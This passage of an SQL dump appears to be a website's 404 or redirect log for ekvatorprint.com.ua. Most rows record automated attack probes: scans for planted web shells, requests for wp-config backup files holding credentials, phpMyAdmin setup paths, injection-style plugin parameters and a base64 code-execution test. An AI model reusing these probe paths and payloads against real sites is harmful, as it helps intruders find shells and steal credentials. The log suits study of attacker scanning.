00:00:00',301),(9003,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-70.png',NULL,'','',1,0,'2017-03-02 10:48:49','0000-00-00 00:00:00',301),(9004,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-63.png',NULL,'','',1,0,'2017-03-02 10:49:04','0000-00-00 00:00:00',301),(9005,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-10.png',NULL,'','',1,0,'2017-03-02 10:49:13','0000-00-00 00:00:00',301),(9006,'http://ekvatorprint.com.ua/oSYdmouNBabiKSNNmZzh5mDl2',NULL,'http://ekvatorprint.com.ua/oSYdmouNBabiKSNNmZzh5mDl2','',1,0,'2017-03-02 15:37:12','0000-00-00 00:00:00',301),(9007,'http://ekvatorprint.com.ua/wp-copv/hook-filters.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-02 17:48:22','0000-00-00 00:00:00',301),(9008,'http://ekvatorprint.com.ua/administrator/layouts/modules.php',NULL,'http://ekvatorprint.com.ua/administrator/layouts/modules.php','',2,0,'2017-03-02 21:01:59','0000-00-00 00:00:00',301),(9009,'http://ekvatorprint.com.ua/administrator/components/modules.php',NULL,'http://ekvatorprint.com.ua/administrator/components/modules.php','',1,0,'2017-03-02 21:02:00','0000-00-00 00:00:00',301),(9010,'http://ekvatorprint.com.ua/catalog/model/total/menustype.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-03 10:25:10','0000-00-00 00:00:00',301),(9011,'http://ekvatorprint.com.ua/menustype.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-03 10:26:51','0000-00-00 00:00:00',301),(9012,'http://ekvatorprint.com.ua/info/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-03 11:40:17','0000-00-00 00:00:00',301),(9013,'http://ekvatorprint.com.ua/administrator/wp-conns.php',NULL,'http://ekvatorprint.com.ua/administrator/wp-conns.php','',1,0,'2017-03-03 21:21:44','0000-00-00 00:00:00',301),(9014,'http://ekvatorprint.com.ua/path/lndex.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-04 02:50:09','0000-00-00 00:00:00',301),(9015,'http://ekvatorprint.com.ua/wp-content/plugins/seo-keyword-page/readme.txt',NULL,'','',6,0,'2017-03-04 04:25:30','0000-00-00 00:00:00',301),(9016,'http://ekvatorprint.com.ua/wp-content/plugins/smart-videos/readme.txt',NULL,'','',1,0,'2017-03-04 05:08:25','0000-00-00 00:00:00',301),(9017,'http://ekvatorprint.com.ua/tmpx.php',NULL,'http://ekvatorprint.com.ua/tmpx.php','',1,0,'2017-03-05 10:53:45','0000-00-00 00:00:00',301),(9018,'http://ekvatorprint.com.ua/wp-content/plugins/wp-handy-lightbox/readme.txt',NULL,'','',6,0,'2017-03-05 22:17:23','0000-00-00 00:00:00',301),(9019,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&view=calendar&month=1',NULL,'http://www.google.com/','',2,0,'2017-03-06 11:52:09','0000-00-00 00:00:00',301),(9020,'http://ekvatorprint.com.ua/wp-ver2.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-06 13:22:06','0000-00-00 00:00:00',301),(9021,'http://ekvatorprint.com.ua/leaf.php',NULL,'http://ekvatorprint.com.ua/leaf.php','',1,0,'2017-03-06 19:47:42','0000-00-00 00:00:00',301),(9022,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=1',NULL,'http://www.google.com/','',1,0,'2017-03-07 01:54:27','0000-00-00 00:00:00',301),(9023,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=1',NULL,'http://www.google.com/','',2,0,'2017-03-07 09:43:17','0000-00-00 00:00:00',301),(9024,'http://ekvatorprint.com.ua/sample.php?sam=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-07 11:56:35','0000-00-00 00:00:00',301),(9025,'http://ekvatorprint.com.ua/wp_cache.php?sam=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-07 11:58:32','0000-00-00 00:00:00',301),(9026,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=1',NULL,'http://www.google.com/','',2,0,'2017-03-07 16:04:03','0000-00-00 00:00:00',301),(9027,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=1',NULL,'http://www.google.com/','',2,0,'2017-03-07 21:20:33','0000-00-00 00:00:00',301),(9028,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&controller=promociones&task=landing&idPromocion=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 01:48:31','0000-00-00 00:00:00',301),(9029,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 05:39:46','0000-00-00 00:00:00',301),(9030,'http://ekvatorprint.com.ua/alb.php',NULL,'http://ekvatorprint.com.ua/alb.php','',1,0,'2017-03-08 08:35:28','0000-00-00 00:00:00',301),(9031,'http://ekvatorprint.com.ua/includes/component.php',NULL,'http://ekvatorprint.com.ua/includes/component.php','',1,0,'2017-03-08 08:35:28','0000-00-00 00:00:00',301),(9032,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 08:54:36','0000-00-00 00:00:00',301),(9033,'http://ekvatorprint.com.ua/mod_footer.php',NULL,'http://ekvatorprint.com.ua/mod_footer.php','',1,0,'2017-03-08 09:01:04','0000-00-00 00:00:00',301),(9034,'http://ekvatorprint.com.ua/index.php?option=com_jofacebookgallery&view=category&id=1',NULL,'http://www.google.com/','',3,0,'2017-03-08 11:44:35','0000-00-00 00:00:00',301),(9035,'http://ekvatorprint.com.ua/index.php?option=com_jofacebookgallery&view=albums&id=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 14:15:47','0000-00-00 00:00:00',301),(9036,'http://ekvatorprint.com.ua/index.php?option=com_jofacebookgallery&view=photo&id=1',NULL,'http://www.google.com/','',3,0,'2017-03-08 16:24:39','0000-00-00 00:00:00',301),(9037,'http://ekvatorprint.com.ua/index.php?option=com_k2store&view=checkout&task=get&Countryid=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 18:16:12','0000-00-00 00:00:00',301),(9038,'http://ekvatorprint.com.ua/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 19:53:38','0000-00-00 00:00:00',301),(9039,'http://ekvatorprint.com.ua/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 21:17:47','0000-00-00 00:00:00',301),(9040,'http://ekvatorprint.com.ua/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 22:33:56','0000-00-00 00:00:00',301),(9041,'http://ekvatorprint.com.ua/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=1',NULL,'http://www.google.com/','',2,0,'2017-03-08 23:38:51','0000-00-00 00:00:00',301),(9042,'http://ekvatorprint.com.ua/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=1',NULL,'http://www.google.com/','',2,0,'2017-03-09 00:37:06','0000-00-00 00:00:00',301),(9043,'http://ekvatorprint.com.ua/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=1',NULL,'http://www.google.com/','',2,0,'2017-03-09 01:29:47','0000-00-00 00:00:00',301),(9044,'http://ekvatorprint.com.ua/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=1',NULL,'http://www.google.com/','',2,0,'2017-03-09 02:15:01','0000-00-00 00:00:00',301),(9045,'http://ekvatorprint.com.ua/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=1',NULL,'http://www.google.com/','',1,0,'2017-03-09 02:56:09','0000-00-00 00:00:00',301),(9046,'http://ekvatorprint.com.ua/index.php?option=com_directorix&view=entriessearch&search_categories[]=1',NULL,'http://www.google.com/','',1,0,'2017-03-09 03:32:36','0000-00-00 00:00:00',301),(9047,'http://ekvatorprint.com.ua/index.php?option=com_jbusinessdirectory&view=companies&companyId=1',NULL,'http://www.google.com/','',2,0,'2017-03-09 04:05:43','0000-00-00 00:00:00',301),(9048,'http://ekvatorprint.com.ua/wp-content/plugins/seo-rotator-for-images/readme.txt',NULL,'','',1,0,'2017-03-09 04:12:55','0000-00-00 00:00:00',301),(9049,'http://ekvatorprint.com.ua/wp-content/plugins/mailchimp-integration/readme.txt',NULL,'','',1,0,'2017-03-09 05:15:06','0000-00-00 00:00:00',301),(9050,'http://ekvatorprint.com.ua/contact27',NULL,'http://ekvatorprint.com.ua/contact27','',2,0,'2017-03-09 09:14:08','0000-00-00 00:00:00',301),(9051,'http://ekvatorprint.com.ua/muieblackcat',NULL,'','',1,0,'2017-03-11 03:15:07','0000-00-00 00:00:00',301),(9052,'http://ekvatorprint.com.ua/admin/scripts/setup.php',NULL,'','',8,0,'2017-03-11 03:15:21','0000-00-00 00:00:00',301),(9053,'http://ekvatorprint.com.ua/admin/pma/scripts/setup.php',NULL,'','',1,0,'2017-03-11 03:15:22','0000-00-00 00:00:00',301),(9054,'http://ekvatorprint.com.ua/admin/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2017-03-11 03:15:22','0000-00-00 00:00:00',301),(9055,'http://ekvatorprint.com.ua/dbadmin/scripts/setup.php',NULL,'','',1,0,'2017-03-11 03:15:30','0000-00-00 00:00:00',301),(9056,'http://ekvatorprint.com.ua/phpmyadmin1/scripts/setup.php',NULL,'','',1,0,'2017-03-11 03:16:00','0000-00-00 00:00:00',301),(9057,'http://ekvatorprint.com.ua/phpmyadmin2/scripts/setup.php',NULL,'','',1,0,'2017-03-11 03:16:05','0000-00-00 00:00:00',301),(9058,'http://ekvatorprint.com.ua/contacts4f',NULL,'','',1,0,'2017-03-11 12:10:08','0000-00-00 00:00:00',301),(9059,'http://ekvatorprint.com.ua/wp-config.php.orig',NULL,'','',3,0,'2017-03-11 22:16:51','0000-00-00 00:00:00',301),(9060,'http://ekvatorprint.com.ua/wp-content/plugins/ads-widget/readme.txt',NULL,'','',1,0,'2017-03-13 19:36:18','0000-00-00 00:00:00',301),(9061,'http://ekvatorprint.com.ua/wp-config.php2',NULL,'','',1,0,'2017-03-14 07:06:20','0000-00-00 00:00:00',301),(9062,'http://ekvatorprint.com.ua/wp-content/plugins/wp-popup/readme.txt',NULL,'','',1,0,'2017-03-15 04:20:26','0000-00-00 00:00:00',301),(9063,'http://ekvatorprint.com.ua/administrator/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/logo_img.php.suspected','',10,0,'2017-03-15 10:23:00','0000-00-00 00:00:00',301),(9064,'http://ekvatorprint.com.ua/wp-config.php_bak',NULL,'','',2,0,'2017-03-15 15:07:04','0000-00-00 00:00:00',301),(9065,'http://ekvatorprint.com.ua/media/MrJoker.PhP.txt',NULL,'','',1,0,'2017-03-16 01:16:50','0000-00-00 00:00:00',301),(9066,'http://ekvatorprint.com.ua/media/MrJoker.txt',NULL,'','',1,0,'2017-03-16 01:16:50','0000-00-00 00:00:00',301),(9067,'http://ekvatorprint.com.ua/wp-config.phpbak',NULL,'','',1,0,'2017-03-16 20:31:44','0000-00-00 00:00:00',301),(9068,'http://ekvatorprint.com.ua/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=1',NULL,'http://www.google.com/','',1,0,'2017-03-16 21:12:58','0000-00-00 00:00:00',301),(9069,'http://ekvatorprint.com.ua/images/stories/0d4y.php',NULL,'','',2,0,'2017-03-16 22:02:42','0000-00-00 00:00:00',301),(9070,'http://ekvatorprint.com.ua/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=1',NULL,'http://www.google.com/','',1,0,'2017-03-16 22:39:55','0000-00-00 00:00:00',301),(9071,'http://ekvatorprint.com.ua/index.php?option=com_jsplocation&task=directionview&id=1',NULL,'http://www.google.com/','',1,0,'2017-03-17 00:08:26','0000-00-00 00:00:00',301),(9072,'http://ekvatorprint.com.ua/index.php?option=com_jsplocation&task=redirectviewinfo&id=1',NULL,'http://www.google.com/','',1,0,'2017-03-17 01:39:13','0000-00-00 00:00:00',301),(9073,'http://ekvatorprint.com.ua/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=1',NULL,'http://www.google.com/','',1,0,'2017-03-17 03:14:06','0000-00-00 00:00:00',301),(9074,'http://ekvatorprint.com.ua/wp-content/plugins/mobile-app-builder-by-wappress/readme.txt',NULL,'','',3,0,'2017-03-17 03:25:52','0000-00-00 00:00:00',301),(9075,'http://ekvatorprint.com.ua/index.php?option=com_jedirectory&view=item_detail&ditemid=1',NULL,'http://www.google.com/','',1,0,'2017-03-17 04:49:36','0000-00-00 00:00:00',301),(9076,'http://ekvatorprint.com.ua/index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=1',NULL,'http://www.google.com/','',1,0,'2017-03-17 06:26:21','0000-00-00 00:00:00',301),(9077,'http://ekvatorprint.com.ua/modules/mod_fxprev/index.html',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/index.html','',1,0,'2017-03-17 17:01:39','0000-00-00 00:00:00',301),(9078,'http://ekvatorprint.com.ua/wp-config.phpold',NULL,'','',1,0,'2017-03-17 17:03:34','0000-00-00 00:00:00',301),(9079,'http://ekvatorprint.com.ua/wp-config.php-bak',NULL,'','',1,0,'2017-03-18 04:49:53','0000-00-00 00:00:00',301),(9080,'http://ekvatorprint.com.ua/index.php?option=com_soccerbet&view=userbethistory&userid=1',NULL,'http://www.google.com/','',1,0,'2017-03-18 21:44:48','0000-00-00 00:00:00',301),(9081,'http://ekvatorprint.com.ua/wp-content/plugins/zen-mobile-app-native/readme.txt',NULL,'','',5,0,'2017-03-18 22:21:54','0000-00-00 00:00:00',301),(9082,'http://ekvatorprint.com.ua/index.php?option=com_onismusic&view=songs&tag=1',NULL,'http://www.google.com/','',1,0,'2017-03-19 00:45:03','0000-00-00 00:00:00',301),(9083,'http://ekvatorprint.com.ua/index.php?option=com_soccerbet&view=matches&cat=1',NULL,'http://www.google.com/','',1,0,'2017-03-19 03:48:22','0000-00-00 00:00:00',301),(9084,'http://ekvatorprint.com.ua/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=1',NULL,'http://www.google.com/','',1,0,'2017-03-19 06:49:06','0000-00-00 00:00:00',301),(9085,'http://ekvatorprint.com.ua/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=asda&searchfield=1',NULL,'http://www.google.com/','',1,0,'2017-03-19 09:48:58','0000-00-00 00:00:00',301),(9086,'http://ekvatorprint.com.ua/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=1&searchfield=Adasda',NULL,'http://www.google.com/','',1,0,'2017-03-19 12:56:32','0000-00-00 00:00:00',301),(9087,'http://ekvatorprint.com.ua/wp-config.bak',NULL,'','',2,0,'2017-03-19 16:45:33','0000-00-00 00:00:00',301),(9088,'http://ekvatorprint.com.ua/bin/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/bin/logo_img.php.suspected','',10,0,'2017-03-19 18:00:16','0000-00-00 00:00:00',301),(9089,'http://ekvatorprint.com.ua/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=1',NULL,'http://www.google.com/','',1,0,'2017-03-19 22:21:44','0000-00-00 00:00:00',301),(9090,'http://ekvatorprint.com.ua/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=1',NULL,'http://www.google.com/','',1,0,'2017-03-20 01:29:53','0000-00-00 00:00:00',301),(9091,'http://ekvatorprint.com.ua/index.php?option=com_booklibrary&task=suggestion&comment=1',NULL,'http://www.google.com/','',1,0,'2017-03-20 04:33:31','0000-00-00 00:00:00',301),(9092,'http://ekvatorprint.com.ua/index.php?option=com_eventix&view=eventsday&selected_date=1',NULL,'http://www.google.com/','',1,0,'2017-03-20 07:35:45','0000-00-00 00:00:00',301),(9093,'http://ekvatorprint.com.ua/index.php?option=com_rsappt_pro3&view=resourceslist&tags=1',NULL,'http://www.google.com/','',1,0,'2017-03-20 10:42:47','0000-00-00 00:00:00',301),(9094,'http://ekvatorprint.com.ua/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt',NULL,'','',11,0,'2017-03-20 11:24:41','0000-00-00 00:00:00',301),(9095,'http://ekvatorprint.com.ua/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=1',NULL,'http://www.google.com/','',1,0,'2017-03-20 13:49:46','0000-00-00 00:00:00',301),(9096,'http://ekvatorprint.com.ua/wp-config.txt',NULL,'','',2,0,'2017-03-20 16:09:30','0000-00-00 00:00:00',301),(9097,'http://ekvatorprint.com.ua/modules/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/logo_img.php.suspected','',10,0,'2017-03-20 20:35:18','0000-00-00 00:00:00',301),(9098,'http://ekvatorprint.com.ua/templates/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/templates/logo_img.php.suspected','',7,0,'2017-03-21 06:40:31','0000-00-00 00:00:00',301),(9099,'http://ekvatorprint.com.ua/plugins/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/logo_img.php.suspected','',4,0,'2017-03-21 16:40:57','0000-00-00 00:00:00',301),(9100,'http://ekvatorprint.com.ua/xmlrpc/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/xmlrpc/logo_img.php.suspected','',6,0,'2017-03-22 06:02:56','0000-00-00 00:00:00',301),(9101,'http://ekvatorprint.com.ua/wp-content/plugins/webapp-builder/readme.txt',NULL,'','',3,0,'2017-03-23 01:35:50','0000-00-00 00:00:00',301),(9102,'http://ekvatorprint.com.ua/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=1',NULL,'http://www.google.com/','',3,0,'2017-03-23 10:44:58','0000-00-00 00:00:00',301),(9103,'http://ekvatorprint.com.ua/index.php?option=com_awdwall&task=gethovercard&wuid=1',NULL,'http://www.google.com/','',2,0,'2017-03-23 14:11:57','0000-00-00 00:00:00',301),(9104,'http://ekvatorprint.com.ua/index.php/medialibrary/media/all-books/all-books/345/view/book/19*/sdasa',NULL,'http://www.google.com/','',2,0,'2017-03-23 16:08:10','0000-00-00 00:00:00',301),(9105,'http://ekvatorprint.com.ua/index.php?option=com_osproperty&view=ltype&catIds[0]=1',NULL,'http://www.google.com/','',2,0,'2017-03-23 20:00:38','0000-00-00 00:00:00',301),(9106,'http://ekvatorprint.com.ua/components/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/components/logo_img.php.suspected','',11,0,'2017-03-23 21:03:33','0000-00-00 00:00:00',301),(9107,'http://ekvatorprint.com.ua/faq.php',NULL,'','',4,0,'2017-03-23 21:28:25','0000-00-00 00:00:00',301),(9108,'http://ekvatorprint.com.ua/memberlist.php?mode=group&g=3',NULL,'','',1,0,'2017-03-23 21:28:36','0000-00-00 00:00:00',301),(9109,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=10913',NULL,'','',1,0,'2017-03-23 21:28:40','0000-00-00 00:00:00',301),(9110,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=1897',NULL,'','',1,0,'2017-03-23 21:28:44','0000-00-00 00:00:00',301),(9111,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=20504',NULL,'','',1,0,'2017-03-23 21:28:52','0000-00-00 00:00:00',301),(9112,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=2454',NULL,'','',1,0,'2017-03-23 21:28:57','0000-00-00 00:00:00',301),(9113,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=2600',NULL,'','',1,0,'2017-03-23 21:29:02','0000-00-00 00:00:00',301),(9114,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=2656',NULL,'','',1,0,'2017-03-23 21:29:10','0000-00-00 00:00:00',301),(9115,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=4581',NULL,'','',1,0,'2017-03-23 21:29:14','0000-00-00 00:00:00',301),(9116,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=5881',NULL,'','',1,0,'2017-03-23 21:29:19','0000-00-00 00:00:00',301),(9117,'http://ekvatorprint.com.ua/memberlist.php?mode=viewprofile&u=9661',NULL,'','',1,0,'2017-03-23 21:29:24','0000-00-00 00:00:00',301),(9118,'http://ekvatorprint.com.ua/posting.php?mode=reply&f=23&t=14237',NULL,'','',1,0,'2017-03-23 21:29:31','0000-00-00 00:00:00',301),(9119,'http://ekvatorprint.com.ua/ucp.php',NULL,'','',3,0,'2017-03-23 21:31:23','0000-00-00 00:00:00',301),(9120,'http://ekvatorprint.com.ua/viewforum.php?f=23',NULL,'','',1,0,'2017-03-23 21:33:11','0000-00-00 00:00:00',301),(9121,'http://ekvatorprint.com.ua/viewtopic.php?f=23&t=14237',NULL,'','',1,0,'2017-03-23 21:33:45','0000-00-00 00:00:00',301),(9122,'http://ekvatorprint.com.ua/viewtopic.php?f=23&t=14237&start=20',NULL,'','',1,0,'2017-03-23 21:34:32','0000-00-00 00:00:00',301),(9123,'http://ekvatorprint.com.ua/viewtopic.php?p=207648',NULL,'','',1,0,'2017-03-23 21:34:49','0000-00-00 00:00:00',301),(9124,'http://ekvatorprint.com.ua/viewtopic.php?p=207649',NULL,'','',1,0,'2017-03-23 21:35:19','0000-00-00 00:00:00',301),(9125,'http://ekvatorprint.com.ua/viewtopic.php?p=207666',NULL,'','',1,0,'2017-03-23 21:35:36','0000-00-00 00:00:00',301),(9126,'http://ekvatorprint.com.ua/viewtopic.php?p=207684',NULL,'','',1,0,'2017-03-23 21:35:44','0000-00-00 00:00:00',301),(9127,'http://ekvatorprint.com.ua/viewtopic.php?p=207821',NULL,'','',1,0,'2017-03-23 21:35:47','0000-00-00 00:00:00',301),(9128,'http://ekvatorprint.com.ua/viewtopic.php?p=207823',NULL,'','',1,0,'2017-03-23 21:35:53','0000-00-00 00:00:00',301),(9129,'http://ekvatorprint.com.ua/viewtopic.php?p=207910',NULL,'','',1,0,'2017-03-23 21:35:59','0000-00-00 00:00:00',301),(9130,'http://ekvatorprint.com.ua/viewtopic.php?p=207912',NULL,'','',1,0,'2017-03-23 21:36:05','0000-00-00 00:00:00',301),(9131,'http://ekvatorprint.com.ua/viewtopic.php?p=207916',NULL,'','',1,0,'2017-03-23 21:36:11','0000-00-00 00:00:00',301),(9132,'http://ekvatorprint.com.ua/viewtopic.php?p=207920',NULL,'','',1,0,'2017-03-23 21:36:17','0000-00-00 00:00:00',301),(9133,'http://ekvatorprint.com.ua/viewtopic.php?p=207922',NULL,'','',1,0,'2017-03-23 21:36:23','0000-00-00 00:00:00',301),(9134,'http://ekvatorprint.com.ua/viewtopic.php?p=207923',NULL,'','',1,0,'2017-03-23 21:36:32','0000-00-00 00:00:00',301),(9135,'http://ekvatorprint.com.ua/viewtopic.php?p=207924',NULL,'','',1,0,'2017-03-23 21:36:39','0000-00-00 00:00:00',301),(9136,'http://ekvatorprint.com.ua/viewtopic.php?p=207925',NULL,'','',1,0,'2017-03-23 21:36:43','0000-00-00 00:00:00',301),(9137,'http://ekvatorprint.com.ua/viewtopic.php?p=207926',NULL,'','',1,0,'2017-03-23 21:36:49','0000-00-00 00:00:00',301),(9138,'http://ekvatorprint.com.ua/viewtopic.php?p=207927',NULL,'','',1,0,'2017-03-23 21:36:52','0000-00-00 00:00:00',301),(9139,'http://ekvatorprint.com.ua/viewtopic.php?p=207928',NULL,'','',1,0,'2017-03-23 21:36:59','0000-00-00 00:00:00',301),(9140,'http://ekvatorprint.com.ua/viewtopic.php?p=207929',NULL,'','',1,0,'2017-03-23 21:37:05','0000-00-00 00:00:00',301),(9141,'http://ekvatorprint.com.ua/viewtopic.php?p=207930',NULL,'','',1,0,'2017-03-23 21:37:10','0000-00-00 00:00:00',301),(9142,'http://ekvatorprint.com.ua/viewtopic.php?p=207931',NULL,'','',1,0,'2017-03-23 21:37:21','0000-00-00 00:00:00',301),(9143,'http://ekvatorprint.com.ua/index.php?option=com_eshop&view=category&id=1',NULL,'http://www.google.com/','',2,0,'2017-03-23 21:56:43','0000-00-00 00:00:00',301),(9144,'http://ekvatorprint.com.ua/index.php?option=com_osservicesbooking&task=default_showmap&vid=1',NULL,'http://www.google.com/','',2,0,'2017-03-23 23:55:23','0000-00-00 00:00:00',301),(9145,'http://ekvatorprint.com.ua/index.php?option=com_osservicesbooking&view=default&category_id=1',NULL,'http://www.google.com/','',2,0,'2017-03-24 01:52:14','0000-00-00 00:00:00',301),(9146,'http://ekvatorprint.com.ua/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=1',NULL,'http://www.google.com/','',1,0,'2017-03-24 03:55:29','0000-00-00 00:00:00',301),(9147,'http://ekvatorprint.com.ua/options/logo_img.php',NULL,'http://ekvatorprint.com.ua/options/logo_img.php','',1,0,'2017-03-24 04:50:07','0000-00-00 00:00:00',301),(9148,'http://ekvatorprint.com.ua/administrator/administrator.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/administrator.php.suspected','',1,0,'2017-03-24 04:50:09','0000-00-00 00:00:00',301),(9149,'http://ekvatorprint.com.ua/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=1',NULL,'http://www.google.com/','',2,0,'2017-03-24 05:51:11','0000-00-00 00:00:00',301),(9150,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/udd.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/udd.php.suspected','',1,0,'2017-03-24 18:34:11','0000-00-00 00:00:00',301),(9151,'http://ekvatorprint.com.ua/cli/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/cli/logo_img.php.suspected','',3,0,'2017-03-24 19:35:13','0000-00-00 00:00:00',301),(9152,'http://ekvatorprint.com.ua/system/logs/include20.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-25 00:49:36','0000-00-00 00:00:00',301),(9153,'http://ekvatorprint.com.ua/admin/language/english/total/search.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-03-25 00:51:47','0000-00-00 00:00:00',301),(9154,'http://ekvatorprint.com.ua/sites/all/themes/hatch/templates/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-03-25 00:53:52','0000-00-00 00:00:00',301),(9155,'http://ekvatorprint.com.ua/libraries/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/logo_img.php.suspected','',3,0,'2017-03-25 04:46:33','0000-00-00 00:00:00',301),(9156,'http://ekvatorprint.com.ua/language/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/language/logo_img.php.suspected','',5,0,'2017-03-25 04:46:47','0000-00-00 00:00:00',301),(9157,'http://ekvatorprint.com.ua/test/wp-admin/setup-config.php',NULL,'','',11,0,'2017-03-25 17:05:21','0000-00-00 00:00:00',301),(9158,'http://ekvatorprint.com.ua/old/wp-admin/setup-config.php',NULL,'','',11,0,'2017-03-25 17:05:22','0000-00-00 00:00:00',301),(9159,'http://ekvatorprint.com.ua/modules/modules/modules.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/modules/modules.php.suspected','',1,0,'2017-03-26 04:36:15','0000-00-00 00:00:00',301),(9160,'http://ekvatorprint.com.ua/logs/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/logs/logo_img.php.suspected','',9,0,'2017-03-26 04:36:16','0000-00-00 00:00:00',301),(9161,'http://ekvatorprint.com.ua/media/jmails.php.suspected?u',NULL,'http://ekvatorprint.com.ua/media/jmails.php.suspected?u','',1,0,'2017-03-26 06:22:56','0000-00-00 00:00:00',301),(9162,'http://ekvatorprint.com.ua/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/readme.txt',NULL,'','',1,0,'2017-03-26 12:43:30','0000-00-00 00:00:00',301),(9163,'http://ekvatorprint.com.ua/administrator/system_info.php',NULL,'','',8,0,'2017-03-26 13:16:19','0000-00-00 00:00:00',301),(9164,'http://ekvatorprint.com.ua/includes/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/includes/logo_img.php.suspected','',5,0,'2017-03-26 15:32:55','0000-00-00 00:00:00',301),(9165,'http://ekvatorprint.com.ua/tmp/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/tmp/logo_img.php.suspected','',7,0,'2017-03-26 15:32:56','0000-00-00 00:00:00',301),(9166,'http://ekvatorprint.com.ua/images/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/images/logo_img.php.suspected','',10,0,'2017-03-26 17:00:31','0000-00-00 